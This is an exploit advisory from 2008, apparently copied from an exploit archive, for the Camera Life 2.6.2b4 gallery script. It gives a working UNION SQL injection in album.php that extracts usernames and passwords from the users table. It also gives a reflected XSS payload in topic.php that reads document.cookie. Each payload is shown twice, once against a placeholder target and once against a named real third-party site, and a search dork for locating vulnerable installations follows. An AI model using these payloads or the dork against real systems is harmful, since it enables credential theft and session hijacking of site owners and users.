[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Camera Life 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities
# Published : 2008-10-09
# Author : BackDoor
# Previous Title : Joomla Component Joomtracker 1.01 Remote SQL injection Vulnerability
# Next Title : Kusaba <= 1.0.4 Remote Code Execution Exploit #2
Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities
Script:Cameralife 2.6.2b4
Download:http://nchc.dl.sourceforge.net/sourceforge/fdcl/cameralife-2.6.2b4.zip
Author:BackDoor
Bug 1;album.php Remote SQL Injection Vulnerability
Exploit:www.target.com/scriptpath/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
Live
http://chrisnolan.org/cameralife/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
Bug 2;topic.php XSS Vulnerability
Exploit:www.target.com/scriptpath/topic.php?name="><script>alert(document.cookie)</script>
Live
http://chrisnolan.org/cameralife/topic.php?name="><script>alert(document.cookie)</script>
Dork:inurl:"cameralife/index.php"
BackDoor Cyber-Security.TIM //Lojistik
# www.Syue.com [2008-10-09]